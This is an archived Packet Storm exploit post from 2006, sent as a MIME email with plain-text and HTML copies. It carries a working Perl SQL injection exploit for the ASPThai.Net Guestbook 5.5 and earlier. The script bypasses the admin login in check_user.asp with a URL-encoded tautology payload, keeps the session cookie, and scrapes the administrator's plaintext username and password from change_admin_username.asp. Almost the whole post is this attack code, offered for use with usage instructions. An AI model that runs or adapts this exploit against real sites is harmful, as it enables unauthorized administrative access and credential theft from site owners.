ASPThai.NetGuestbook.pl.txt

2006-02-08T00:00:00
ID PACKETSTORM:43637
Type packetstorm
Reporter MurderSkillz
Modified 2006-02-08T00:00:00

Description

                                        
                                            `------=_Part_9669_22649246.1139201383091  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for  
ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes  
place in admin.asp. IF injected with special characters into the login it  
will grant u with admin..BUT we wrote wrote some code to grab plaintext use=  
r  
and pass..here is the code  
  
  
#!/usr/bin/perl  
# SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5  
#(And possible higher could not find a site to test it on)  
# This exploit shows the username of the administrator and the password In  
plain text  
# Bug Found by muderskillz Coded by Zodiac  
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and  
anyone else I forgot.  
# http://exploitercode.com/ http://www.g00ns.net  
#irc.g00ns.net #g00ns email =3D zodiac@g00ns.net  
#(c) 2006  
  
use LWP::UserAgent;  
use HTTP::Cookies;  
  
  
$Server =3D $ARGV[0];  
  
if($Server =3D~m/http/g)  
{  
$Server=3D~ 'http://$Server';  
print  
}  
  
else {  
print $error;  
}  
  
  
  
  
if(!$Server) {usage();exit() ;}  
  
head();  
  
  
  
print "\r\nGrabbing Username And Password\r\n\n";  
  
  
  
#Login's and stores a cookie to view admin panel later  
  
  
$xpl =3D LWP::UserAgent->new() or die;  
$cookie_jar =3D HTTP::Cookies->new();  
  
$xpl->agent('g00ns');  
$xpl->cookie_jar($cookie_jar);  
  
$res =3D $xpl->post(  
$Server.'check_user.asp',  
Content =3D> [  
  
  
'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'Submit' =3D> '-=3D Login =3D-',  
],  
);  
  
  
  
# Create a request  
my $req =3D HTTP::Request->new(GET =3D>  
  
$Server.'change_admin_username.asp'  
  
);  
  
$req->header('Referer', $Server.'admin_menu.asp');  
  
  
  
my $res =3D $xpl->request($req);  
  
$info=3D $res->content;  
  
if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)  
{  
die "Error Connecting...\r\n";  
}  
  
  
  
  
#Check the outcome of the response  
  
  
  
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$User =3D $2;  
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$Pass=3D $2;  
  
  
print "UserName:$User\r\nPassword:$Pass\r\n";  
  
  
  
sub head()  
{  
print  
"\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by  
www.g00ns.net*\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
}  
sub usage()  
{  
head();  
print " Usage: Thaisql.pl <Site> \r\n\n";  
print " <Site> - Full path to Guestbook e.g.  
http://www.site.com/guestbook/\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n";  
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
exit();  
}  
  
  
  
its been out for like 2 days now..  
  
------=_Part_9669_22649246.1139201383091  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<div>I MurderSkillz from <a href=3D"http://g00ns.net">g00ns.net</a> found a=  
vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and=  
POSSIBLY higher" The sql injection takes place in admin.asp. IF injec=  
ted with special characters into the login it will grant u with admin..BUT =  
we wrote wrote some code to grab plaintext user and pass..here is the code  
</div>  
<div> </div>  
<div>  
<p>#!/usr/bin/perl<br># SQL Injection Exploit for ASPThai.Net Guestbook &lt=  
;=3D 5.5  <br>#(And possible higher could not find a site to test it o=  
n)<br># This exploit shows the username of the administrator and the passwo=  
rd In plain text  
<br># Bug Found by muderskillz Coded by Zodiac<br># Shouts to cijfer,uid0,|=  
n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.<br># <=  
a href=3D"http://exploitercode.com/">http://exploitercode.com/</a> <a href=  
=3D"http://www.g00ns.net/">  
http://www.g00ns.net</a> <br>#irc.g00ns.net #g00ns  email =3D <a href=  
=3D"mailto:zodiac@g00ns.net">zodiac@g00ns.net</a><br>#(c) 2006</p>  
<p>use LWP::UserAgent;<br>use HTTP::Cookies;</p>  
<p><br>$Server =3D $ARGV[0];</p>  
<p>if($Server =3D~m/http/g)<br>{<br>$Server=3D~ 'http://$Server';<br>print =  
<br>}</p>  
<p>else {<br>  print $error;<br>}</p>  
<p> </p>  
<p><br>if(!$Server) {usage();exit() ;}</p>  
<p>head();</p>  
<p> </p>  
<p>print "\r\nGrabbing Username And Password\r\n\n";</p>  
<p> </p>  
<p>#Login's and stores a cookie to view admin panel later</p>  
<p><br> $xpl =3D LWP::UserAgent->new() or die;<br> $cookie_jar=  
=3D HTTP::Cookies->new();</p>  
<p> $xpl->agent('g00ns');<br> $xpl->cookie_jar($cookie_jar)=  
;</p>  
<p> $res =3D $xpl->post(<br> $Server.'check_user.asp',<br>&nbs=  
p;Content =3D> [ </p>  
<p><br> 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30=  
%6e%73', <br> 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67=  
%30%30%6e%73',<br> 'Submit' =3D> '-=3D Login =3D-',<br> ],<br>=  
 );</p>  
<p> </p>  
<p># Create a request<br>my $req =3D HTTP::Request->new(GET =3D> </p>  
<p>$Server.'change_admin_username.asp'</p>  
<p>);</p>  
<p>$req->header('Referer', $Server.'admin_menu.asp');</p>  
<p> </p>  
<p>my $res =3D $xpl->request($req);</p>  
<p>$info=3D $res->content;</p>  
<p>if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) <br>=  
{ <br> die "Error Connecting...\r\n"; <br>}</p>  
<p> </p>  
<p><br>#Check the outcome of the response</p>  
<p> </p>  
<p>$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$User =3D $2;<br>$info=  
=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$Pass=3D $2;</p>  
<p><br>print "UserName:$User\r\nPassword:$Pass\r\n";</p>  
<p> </p>  
<p>sub head()<br> {<br> print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> print "* ASPT=  
hai.Net Guestbook version 5.5 SQL Injection by <a href=3D"http://www.g00ns.=  
net/">  
www.g00ns.net</a> *\r\n";   <br> print "=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> =  
}<br>sub usage()<br> {<br> head();<br> print " Usage: T=  
haisql.pl <Site>  \r\n\n";  
<br> print " <Site> - Full path to Guestbook e.g. <a href=  
=3D"http://www.site.com/guestbook/">http://www.site.com/guestbook/</a> \r\n=  
";<br> print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D\r\n";  
<br> print "   -=3DCoded by Zodiac, Bug Found by Murder=  
Skillz=3D-\r\n";<br> print "<a href=3D"http://www.exploiterc=  
ode.com/">www.exploitercode.com</a> <a href=3D"http://www.g00ns.net/">www.g=  
00ns.net</a> <a href=3D"http://irc.g00ns.net">  
irc.g00ns.net</a> #g00ns\r\n";<br> print "=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> exit();<b=  
r> }</p>  
<p> </p>  
<p>its been out for like 2 days now..<br> </p></div>  
  
------=_Part_9669_22649246.1139201383091--  
`